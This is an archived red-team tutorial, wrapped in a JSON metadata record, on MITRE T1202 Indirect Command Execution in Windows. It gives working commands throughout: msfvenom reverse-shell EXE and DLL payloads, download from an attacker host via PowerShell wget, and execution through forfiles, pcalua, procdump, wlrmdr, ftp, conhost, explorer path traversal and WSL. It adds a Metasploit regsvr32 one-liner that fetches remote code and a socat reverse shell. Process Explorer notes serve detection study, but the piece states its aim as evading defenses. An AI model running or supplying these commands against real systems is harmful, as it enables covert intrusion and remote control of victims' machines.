{
	"id": "d215f48c-8156-4624-8748-840432ae747e",
	"created_at": "2026-04-06T00:11:02.649349Z",
	"updated_at": "2026-04-10T03:21:48.971994Z",
	"deleted_at": null,
	"sha1_hash": "9fd8ee281a067f9d820511a40086a0beb08e4f95",
	"title": "Indirect Command Execution: Defense Evasion (T1202)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1500855,
	"plain_text": "Indirect Command Execution: Defense Evasion (T1202)\r\nBy raj\r\nPublished: 2022-03-17 · Archived: 2026-04-05 17:32:26 UTC\r\nRed Teams often use Indirect Command Execution as a defense evasion technique in which an adversary tries to bypass defense filters that restrict certain types of scripts or executables from running. Various Windows utilities allow users to execute commands, possibly without invoking cmd.exe. For example, if a firewall restricts DLL execution, an adversary can bypass it using the procdump method, or if an allowlist of executables includes pcalua.exe, an adversary can use it to execute other executables. This article discusses some of these methods.\r\nMITRE TACTIC: Defense Evasion (TA0005)\r\nMITRE TECHNIQUE ID: T1202 (Indirect Command Execution)\r\nTable of contents\r\nMalicious EXE creation\r\nMethod 1 – forfiles.exe\r\nMethod 2 – pcalua.exe\r\nMethod 3 – procdump.exe (DLL method)\r\nMethod 4 – SyncAppvPublishingServer.vbs\r\nMethod 5 – wlrmdr.exe\r\nMethod 6 – explorer.exe\r\nMethod 7 – cmd.exe\r\nMethod 8 – ftp.exe\r\nMethod 9 – conhost.exe\r\nMethod 10 – WSL Only (bash.exe)\r\nMethod 11 – WSL Only (wsl.exe)\r\nConclusion\r\nMalicious EXE Creation\r\nFirst, we need to create an executable that will be executed. This is a simple simulation of what might happen in a real Red Team scenario. We’ll use msfvenom to create a simple reverse shell. After that, we need to upload this exe to the victim machine using a Python HTTP server.\r\nmsfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.89 LPORT=4444 -f exe \u003e shell.exe\r\npython3 -m http.server 80\r\nhttps://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/\r\nPage 1 of 22\r\nNow, we can upload this executable to the already compromised victim device using powershell wget:\r\npowershell wget 192.168.0.89/shell.exe -O C:\\Users\\Public\\shell.exe\r\nNow, the file is uploaded to the C:\\Users\\Public directory for further use.\r\nMethod 1 – forfiles\r\nAccording to Microsoft, “Selects and runs a command on a file or set of files. This command is most commonly used in batch files.” Here, /p specifies the path where forfiles will search for the search mask defined by the /m flag (here, calc.exe). Anything after the /c flag is the actual command, so forfiles will now run our custom-made shell: a classic example of indirect command execution in Windows.\r\nforfiles /p c:\\windows\\system32 /m calc.exe /c C:\\Users\\Public\\shell.exe\r\nOn our reverse listener set up on port 4444, we receive a connection as the shell gets executed!\r\nInspection in Process Explorer: On the victim system, if an analyst checks Process Explorer, they will see the following processes running, which should make them suspicious. As you can see, forfiles.exe is running a suspicious file “shell.exe”.\r\nMethod 2 – pcalua.exe\r\nThe Program Compatibility Assistant is an automatic feature of Windows that runs when it detects that an older program has a compatibility problem. Because of the utility of this executable, systems often whitelist it. It can also run a custom exe in compatibility mode. We can run our executable using the program with the “-a” flag like so:\r\npcalua.exe -a C:\\Users\\Public\\shell.exe\r\nOn our reverse listener set up on port 4444, we receive a connection as we execute the shell!\r\nInspection in Process Explorer: On the victim system, if an analyst checks Process Explorer, they will see the following processes running, which should make them suspicious. As you can see, shell.exe has spawned as a standalone process.\r\nMethod 3 – procdump.exe (DLL method)\r\nProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. The Sysinternals team developed this binary, which you can also use to execute a DLL file by utilizing the ‘MiniDumpCallbackRoutine’ exported function. You must provide a valid running process, as you will create a memory dump of that process while loading this DLL into it.\r\nFirst, we need to create our DLL payload using msfvenom:\r\nmsfvenom -p windows/shell_reverse_tcp -f dll LHOST=192.168.0.89 LPORT=4444 \u003e shell.dll\r\nOnce the DLL has been uploaded onto the victim system using the Python server and the powershell wget utility, procdump can be run with the “-md” option:\r\nC:\\Sysinternals\\procdump.exe -md shell.dll explorer.exe\r\nOn our reverse listener set up on port 4444, we receive a connection as the shell gets executed!\r\nInspection in Process Explorer: On the victim system, if an analyst checks Process Explorer, they will see the following processes running, which should make them suspicious. As you can see, our DLL has been executed using rundll as a child process of procdump.\r\nMethod 4 – SyncAppvPublishingServer.vbs\r\nSyncAppvPublishingServer.vbs is a script available in newer versions of Windows 10 and 11 only. Microsoft develops it, and users can utilize it for MS Application Virtualization. Users can also indirectly use it for executing an EXE. The .NET cmdlet known as “Start-Process” achieves this.\r\nSyncAppvPublishingServer.vbs \"n; Start-Process C:\\Users\\Public\\shell.exe\"\r\nOn our reverse listener set up on port 4444, we receive a connection as the shell gets executed!\r\nInspection in Process Explorer: On the victim system, if an analyst checks Process Explorer, they will see the following processes running, which should make them suspicious. As you can see, a conhost has been spawned inside a powershell process.\r\nSince just passing in the exe’s path can make the VBS script execute it, we can also use the regsvr32 method in Metasploit.\r\nuse multi/script/web_delivery\r\nset payload windows/meterpreter/reverse_tcp\r\nset lhost 192.168.0.89\r\nset lport 1337\r\nset target 3\r\nrun\r\nNow, we can inject this command into the SyncAppvPublishingServer.vbs script by giving a break clause and then the one-liner.\r\nSyncAppvPublishingServer.vbs \"Break; regsvr32 /s /n /u /i:http://192.168.0.89:8080/qYRAgZv3qAaNC.sct scrobj.dll\"\r\nOn our Metasploit console, we receive a reverse shell!\r\nInspection in Process Explorer: On the victim system, if an analyst checks Process Explorer, they will see the following processes running, which should make them suspicious. As you can see, a conhost has been spawned inside a powershell process.\r\nMethod 5 – wlrmdr.exe\r\nWindows Logon Reminder (wlrmdr.exe) is an executable file available by default in Microsoft Windows which often throws up balloon reminders saying that Windows needs to lock and unlock the device in order to update Windows login credentials. This tool takes a number of flags as input, making it a potential candidate for Indirect Command Execution scenarios.\r\n-s : Time to show the notification in milliseconds. Use 0 to display the notification without a timeout.\r\n-f \u003cx\u003e : One or more of the following values that indicate an icon to display in the notification.\r\n0x00000000 = Do not display an icon.\r\n0x00000001 = Display an information icon.\r\n0x00000002 = Display a warning icon.\r\n0x00000003 = Display an error icon.\r\n0x00000004 = Icon of keys.\r\n0x00000010 = Do not play the associated sound.\r\nx is decimal. To display an information icon without sound = 0x01 + 0x10 = 0x11 = 17 decimal.\r\n-t : Text, first line\r\n-m : Text, second line\r\n-u : Executable to run\r\nwlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u C:\\Users\\Public\\shell.exe\r\nOn our reverse listener set up on port 4444, we receive a connection as the shell gets executed!\r\nInspection in Process Explorer: On the victim system, if an analyst checks Process Explorer, they will see the following processes running, which should make them suspicious. As you can see, shell.exe has been spawned as a standalone process.\r\nMethod 6 – explorer.exe\r\nWhen a user opens the file manager, they run the executable Explorer.exe. The path bar, which shows the current working directory, also serves as a run prompt where entering the name of a binary spawns it (like cmd.exe). Moreover, Explorer.exe spawns the binary as a child process. You can also achieve this via the command line.\r\nexplorer.exe /root,\"C:\\Users\\Public\\shell.exe\"\r\nOn our reverse listener set up on port 4444, we receive a connection as the shell gets executed!\r\nInspection in Process Explorer: On the victim system, if an analyst checks Process Explorer, they will see the following processes running, which should make them suspicious. As you can see, cmd.exe has been spawned, which in turn runs our shell.exe.\r\nMethod 7 – cmd.exe\r\nCmd.exe is the command prompt (terminal) of Windows and is capable of executing binaries using the /c flag. One can indirectly execute a malicious file using cmd.exe like so:\r\ncmd.exe /c C:\\Users\\Public\\shell.exe\r\nMoreover, an attacker may also benefit from the lesser-known path traversal execution method. This lets an attacker traverse back to explorer.exe and use that to initiate the process for “shell.exe”. This complicates the analysis for a blue teamer and is considered better than the previous method.\r\ncmd.exe /c \"ignite.local /../../../../../../../../../../windows/explorer.exe\" /root,C:\\Users\\Public\\shell.exe\r\nOn our reverse listener set up on port 4444, we establish a connection as the shell executes!\r\nInspection in Process Explorer: On the victim system, if an analyst checks Process Explorer, they will see the following processes running, which should make them suspicious. As you can see, the system has spawned a conhost (masking our shell) as a child process under the explorer.exe process, which is stealthier.\r\nMethod 8 – ftp.exe\r\nNewer versions of Windows 10 and 11 come with an ftp.exe binary already included in the default installation. Moreover, the system PATH variable makes it available, so you can execute it from any working directory. We can therefore put the command we want to run in a text file called “script.txt” and execute it using the ftp -s option, which executes text files as a script. Hence, we include the explorer.exe command in this script and execute it using ftp.\r\necho !explorer.exe /root,\"C:\\Users\\Public\\shell.exe\" \u003e script.txt \u0026\u0026 ftp -s:script.txt\r\nOn our reverse listener set up on port 4444, we receive a connection as the shell gets executed!\r\nInspection in Process Explorer: On the victim system, if an analyst checks Process Explorer, they will see the following processes running, which should make them suspicious. As you can see, an ftp instance is running with no notable indication of our shell.exe in the process list, making it stealthier.\r\nMethod 9 – conhost.exe\r\nConhost.exe stands for Console Host, which was introduced with Windows 7. It is a sort of bridge between the old-school CSRSS and cmd.exe. More information can be found here. In simpler terms, it helps Command Prompt interact with Windows Explorer and provides functionality like dragging and dropping text from Explorer to cmd.exe, another technique useful for Indirect Command Execution.\r\nConhost can also be used to launch arbitrary executables. Depending on which Windows version you are using, the results may vary, but as of Build 1809, I found it to be working.\r\nconhost \"ignite.local C:\\Users\\Public\\shell.exe\"\r\nOn our reverse listener set up on port 4444, we establish a connection as the shell executes!\r\nInspection in Process Explorer: On the victim system, if an analyst checks Process Explorer, they will see the following processes running, which should make them suspicious. As you can see, a cmd.exe process has launched a conhost instance. It remains stealthy compared to other methods, as Process Explorer doesn’t show shell.exe.\r\nMethod 10 – WSL Only (bash.exe)\r\nThe next two methods are use-case specific. WSL stands for Windows Subsystem for Linux and lets a user install an instance of their favourite Linux distro onto Windows itself by creating a subsystem. Here, the victim has installed an Ubuntu instance in WSL. It can be installed by following the instructions provided here.\r\nIf the victim has installed WSL with the socat package, we can use the bash.exe present on the system to obtain a reverse shell like so:\r\nbash.exe -c \"socat tcp-connect:192.168.0.89:4444 exec:sh,pty,stderr,setsid,sigint,sane\"\r\nOn our reverse listener set up on port 4444, we receive a connection as the shell executes!\r\nInspection in Process Explorer: On the victim system, an analyst may check Process Explorer. They will notice some suspicious processes running. Specifically, the wsl.exe process has been launched. Under it, conhost.exe is initiated. Alongside it, socat and bash processes are also running. This behavior is stealthy and unusual.\r\nMethod 11 – WSL Only (wsl.exe)\r\nA socat instance on WSL is plausible but not necessary. By default, the Windows system includes an executable called wsl.exe when it installs WSL. You can use this exe to launch the exe present in WSL. This way, the shell will launch indirectly.\r\nwsl.exe -e /mnt/c/Users/Public/shell.exe\r\nWe receive a connection on our reverse listener set up on port 4444 as the shell executes!\r\nInspection in Process Explorer: On the victim system, if an analyst checks Process Explorer, they will see the following processes running, which should make them suspicious. As you can see, the system has launched the wsl.exe process, which initiates conhost along with a shell.exe process. It is not as stealthy as the other methods.\r\nConclusion\r\nWhile some of the methods described above are stealthy, others create some noise. Red Teamers must evaluate which method they want to use in order to conduct their operations smoothly. The aim of the article was to demonstrate as many methods as possible for Indirect Command Execution in order for a user to evade defenses easily. Hope you liked the article. Thanks for reading.\r\nAuthor: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here\r\nSource: https://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/"
	],
	"report_names": [
		"indirect-command-execution-defense-evasion-t1202"
	],
	"threat_actors": [],
	"ts_created_at": 1775434262,
	"ts_updated_at": 1775791308,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9fd8ee281a067f9d820511a40086a0beb08e4f95.pdf",
		"text": "https://archive.orkl.eu/9fd8ee281a067f9d820511a40086a0beb08e4f95.txt",
		"img": "https://archive.orkl.eu/9fd8ee281a067f9d820511a40086a0beb08e4f95.jpg"
	}
}